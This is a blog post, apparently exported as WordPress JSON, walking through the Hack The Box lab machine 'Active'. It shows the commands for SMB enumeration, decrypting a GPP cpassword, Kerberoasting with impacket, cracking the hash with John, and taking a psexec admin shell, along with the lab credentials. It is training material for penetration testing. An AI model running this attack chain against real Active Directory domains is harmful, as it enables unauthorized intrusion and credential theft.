{"id":38,"date":"2020-11-02T23:37:20","date_gmt":"2020-11-02T23:37:20","guid":{"rendered":"http:\/\/dextersec.xyz\/?p=38"},"modified":"2020-11-20T14:00:51","modified_gmt":"2020-11-20T14:00:51","slug":"active-directory-101-active","status":"publish","type":"post","link":"https:\/\/dextersec.xyz\/?p=38","title":{"rendered":"Active Directory 101: Active"},"content":{"rendered":"\n

Introduction<\/strong><\/h2>\n\n\n\n

For my first machine in the Hackthebox Active Directory 101 track, I\u2019ll be pwning Active. Active is an active directory machine that teaches the basics of GPP attacks <\/a>and kerberoasting<\/a>. The attack path to domain admin was quite straightforward following a brief introduction to AD hacking by TCM, for this box, initial access was gained via a poorly configured SMB share containing a windows group policy preference configuration file (groups.xml), then kereberoasting was leveraged to escalate privileges.<\/p>\n\n\n\n\n\n\n\n

Reconnaissance<\/strong><\/p>\n\n\n\n

I ran a simple nmap scan with the command: <\/p>\n\n\n\n

nmap -sV -sC 10.10.10.100 -oN active_scan<\/code><\/pre>\n\n\n\n
sV \u2013 Specifies the service version for each port<\/p>\n\n\n\n
sC \u2013 Specifies that nmap nse scripts should be run on each discovered port<\/p>\n\n\n\n
oN \u2013 Specifies the format the scan result is saved in, here we use the nmap format<\/p>\n\n\n\n
\"\"
Figure 1: Nmap Scan Output<\/figcaption><\/figure>\n\n\n\n
From the Nmap scan above we can gather the following:<\/p>\n\n\n\n
  1. Port 53 indicates that DNS is running on this machine<\/li>
  2. Port 88 is running the Kerberos authentication service<\/li>
  3. Ports 389 & 3628 have LDAP running<\/li>
  4. The host scripts reveal that SMBv2 is running on port 445<\/li>
  5. The host is a Domain Controller<\/li>
  6. LDAP provides us with the domain name active.htb<\/li><\/ol>\n\n\n\n
    Enumeration<\/strong><\/h2>\n\n\n\n
    In enumerating this box the easiest attack vector would be through SMB, But before dive in we need to update our \/etc\/hosts<\/strong> file with the domain name gathered during reconnaissance.<\/p>\n\n\n\n
    First, run the command:<\/p>\n\n\n\n
    nano \/etc\/hosts<\/code><\/pre>\n\n\n\n
    Update the host file, then save changes.<\/p>\n\n\n\n
    \"\"
    Figure 2: Shows the mapping of IP address 10.10.10.100 to the domain name active.htb<\/figcaption><\/figure><\/div>\n\n\n\n
    smbmap, can be used to determine what shares we have anonymous read\/write access to;<\/p>\n\n\n\n
    smbmap -H active.htb<\/code><\/pre>\n\n\n\n
    -H: takes in the domain name as an argument<\/strong><\/p>\n\n\n\n
    we get the following results.<\/p>\n\n\n\n
    \"\"
    Figure 3: Shows the shares and their respective permissions<\/figcaption><\/figure><\/div>\n\n\n\n
    Admin$, C$. IPC$, NETLOGON, SYSVOL and Users are usual windows shares, the Replications share stands out and provides us with a read only permission.<\/p>\n\n\n\n
    Intermission: In a real word penetration test, you want to take a peek at the SYSVOL share. SYSVOL often contains group policy preference configuration files from which cpassword hashes can be obtained and decrypted.  \n<\/code><\/pre>\n\n\n\n
    \n
    Check out <\/em>https:\/\/adsecurity.org\/?p=2288<\/em><\/a> for further details.<\/em><\/p>\n<\/div><\/div>\n\n\n\n
    Now that we have read permission to the replication share, lets login anonymously with smbclient using the password anonymous.<\/strong><\/p>\n\n\n\n
    smbclient  \/\/active.htb\/Replication<\/code><\/pre>\n\n\n\n
    \"\"
    Figure 4: Shows successful login to the replication share<\/em><\/figcaption><\/figure>\n\n\n\n
    A quick and easy way to find interesting files within the replication share would be to recursively download all the files it contains to our local machine.<\/p>\n\n\n\n
    RECUSRE ON\nPROMPT OFF\nmget *<\/code><\/pre>\n\n\n\n
    \"\"
    Figure 5: using mget * intiates the download of all contents contained in the replication share.<\/figcaption><\/figure>\n\n\n\n
    From enumerating the SMB share, We can see a groups.xml file, this group policy preference configuration file contains a cpassword which can be decrypted to gain initial access to the host.<\/p>\n\n\n\n
    First we copy out the cpassword in our groups.xml file then use an inbuilt kali tool called gpp-decrypt to obtain a clear text password.<\/p>\n\n\n\n
    cat groups.xml<\/code><\/pre>\n\n\n\n
    \"\"
    Figure 6: Shows contents of the group.xml configuration file<\/figcaption><\/figure>\n\n\n\n
    gpp-decrypt <cpassword><\/code><\/pre>\n\n\n\n
    \"\"
    Figure 7: Decrypting the cpassword with gpp-decrypt<\/figcaption><\/figure>\n\n\n\n
    Now we have a cleartext password for the user SVC_TGS<\/p>\n\n\n\n
    GPPstillStandingStrong2k18<\/code><\/pre>\n\n\n\n
    <\/p>\n\n\n\n
    Initial Access<\/strong><\/h2>\n\n\n\n
    The next step in pwning this box would be to establish initial foothold, to achieve this, we\u2019ll go ahead and logon to our target machine using the credentials found earlier for the domain user SVC_TGS via SMB.<\/p>\n\n\n\n
    Login to the users share and grab the user flag.<\/p>\n\n\n\n
    smbclient -U SVC_TGS -W active.htb \/\/active.htb\/Users<\/code><\/pre>\n\n\n\n
    -U Specifies the username
    -W Specifies the domain<\/strong><\/p>\n\n\n\n
    \"\"
    Figure 8: Logging onto the User SMB share <\/figcaption><\/figure>\n\n\n\n
    Navigate to the directory containing the user flag.<\/p>\n\n\n\n
    cd  SVC_TGS\/Desktop<\/code><\/pre>\n\n\n\n
    Download the user.txt file to your local machine and view the contents of the flag.<\/p>\n\n\n\n
    mget user.txt<\/code><\/pre>\n\n\n\n
    cat user.txt<\/code><\/pre>\n\n\n\n
    \"\"
    Figure 9: Content of the user flag<\/figcaption><\/figure><\/div>\n\n\n\n
    Privilege Escalation<\/strong><\/h2>\n\n\n\n
    Since we are working with windows active directory we can leverage on a technique called kereberoasting to escalate our privileges. We do this by abusing a windows AD feature that allows authenticated users with a valid ticket granting ticket requesting for one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller to grab the hash of the service account associated with the SPN. The GetUserSPNs binary from Metasploit framework or impacket suite is the tool of choice for this step. For this write up I\u2019ll be covering you the impacket method.<\/p>\n\n\n\n
    If you don\u2019t have impacket installed simply run the command:<\/p>\n\n\n\n
    apt-get install python3-impacket<\/code><\/pre>\n\n\n\n
    Optional:<\/strong><\/p>\n\n\n\n
    Once we have the impacket suite installed, we could add it to our path. This enables us run impacket binaries from any location within our terminal.<\/p>\n\n\n\n
    echo $PATH\n<\/code><\/pre>\n\n\n\n
    export PATH=$PATH:\/usr\/share\/doc\/python3-impacket\/examples<\/code><\/pre>\n\n\n\n
    Also, before running the GetUserSPNs Impacket binary, install ntpdate and synchronize your attacking machine’s time with the Domain Controller to avoid time synchronization errors during kerberoasting.<\/p>\n\n\n\n
    apt-get install ntpdate<\/code><\/pre>\n\n\n\n
    ntpdate <domain controller IP address><\/code><\/pre>\n\n\n\n
    \"\"
    Figure 10: Synchronizing our time zone with the domain controller’s<\/figcaption><\/figure>\n\n\n\n
    Next, run the command below to steal the administrator\u2019s hash from the TGS ticket.<\/p>\n\n\n\n
    python3 GetUserSPNs.py active.htb\/SVC_TGS:GPPStillStandingStrong2k18 -dc-ip 10.10.10.100 -request<\/code><\/pre>\n\n\n\n
    Target: domain\/username:password
    -dc-ip \u2013 Specifies the IP address of the target Domain controller
    -request – Fetches TGS for users in John the ripper\/hashcat format<\/p>\n\n\n\n
    \"\"
    Figure 11: We get back the hash of the Administrator from the TGS Ticket<\/figcaption><\/figure>\n\n\n\n
    We can run an offline brute force attack on the encrypted portion of the TGS ticket to reveal the service account password. Therefore, if the administrator is using a weak password, cracking should be pretty easy.<\/p>\n\n\n\n
    Save the captured hash into a file and crack it with john the ripper;<\/p>\n\n\n\n
    john \u2013wordlist=\/usr\/share\/wordlists\/rockyou.txt admin_hashes.txt<\/code><\/pre>\n\n\n\n
    –wordlist \u2013 specifies the wordlist to be used in bruteforcing the hash<\/p>\n\n\n\n
    \"\"
    Figure 12: We successfully cracked the administrator\u2019s password using john!<\/figcaption><\/figure>\n\n\n\n
    Finally we can go ahead to spawn a shell on target machine using the cracked credentials for the domain user \u201cAdministrator\u201d, the psexec module from metasploit framework or impacket suite is the tool of choice for this step. For this write up I\u2019ll be covering you the impacket method.<\/p>\n\n\n\n
    Run psexecy.py to gain access to the domain controller as an administrator and grab the root flag.<\/p>\n\n\n\n
    python3 psexec.py active.htb\/Administrator:Ticketmaster1968@active.htb<\/code><\/pre>\n\n\n\n
    \"\"
    Figure 13: psexec.py gives us a shell by uploading and executing a malicious binary on the target machine<\/figcaption><\/figure>\n\n\n\n
    Boom! Our privilege has been escalated and we have administrative rights to resources on the domain controller.<\/p>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    Introduction For my first machine in the Hackthebox Active Directory 101 track, I\u2019ll be pwning Active. Active is an active directory machine that teaches the basics of GPP attacks and kerberoasting. The attack path to domain admin was quite straightforward following a brief introduction to AD hacking by TCM, for this box, initial access was […]<\/p>\n","protected":false},"author":1,"featured_media":42,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,9],"tags":[4,5,3,6,7],"class_list":["post-38","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-active-directory-101","category-walkthroughs","tag-active-directory","tag-hacking","tag-hackthebox","tag-kerberoasting","tag-writeup"],"_links":{"self":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts\/38"}],"collection":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38"}],"version-history":[{"count":9,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts\/38\/revisions"}],"predecessor-version":[{"id":227,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/posts\/38\/revisions\/227"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=\/wp\/v2\/media\/42"}],"wp:attachment":[{"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dextersec.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}